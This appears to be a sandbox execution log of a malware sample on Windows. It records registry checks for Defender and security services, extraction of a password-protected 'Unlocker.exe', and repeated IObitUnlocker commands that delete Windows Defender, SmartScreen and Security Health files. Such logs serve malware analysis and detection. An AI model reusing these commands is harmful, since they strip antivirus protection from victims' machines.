C:\Windows\system32\cmd.exe /c ver

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"

C:\Windows\SysWOW64\find.exe

find /i "0x0"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c tasklist

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WinDefend"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"

C:\Users\Admin\AppData\RoamingLWSLVVEH8CXRQMJM7LF4WXNYLUJCFBVW.EXE

"C:\Users\Admin\AppData\RoamingLWSLVVEH8CXRQMJM7LF4WXNYLUJCFBVW.EXE"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\Sense"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\wscsvc"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WdBoot"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WdFilter"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"

C:\Windows\SysWOW64\reg.exe

reg query HKLM\System\CurrentControlset\Services\WdFilter

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"

C:\Windows\SysWOW64\find.exe

find /i "Windows 7"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ver "

C:\Windows\SysWOW64\findstr.exe

findstr /c:"6.1.7601"

C:\Users\Admin\AppData\Local\Temp\Work\7z.exe

7z x -aoa -bso0 -bsp1 "DKT.zip" -p"DDK" "Unlocker.exe"

C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe

Unlocker /CurrentDiskSize

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker

C:\Windows\system32\sc.exe

sc query IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid "2932"

C:\Windows\system32\taskkill.exe

taskkill /f /pid "2932"

C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe

Unlocker /dеlwd

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker

C:\Windows\system32\sc.exe

sc query IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker

C:\Windows\system32\sc.exe

sc stop IObitUnlocker

C:\Windows\system32\sc.exe

sc delete IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid "3956"

C:\Windows\system32\taskkill.exe

taskkill /f /pid "3956"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2 /nobreak

C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe

Unlocker /DеlWD

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker

C:\Windows\system32\sc.exe

sc query IObitUnlocker

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

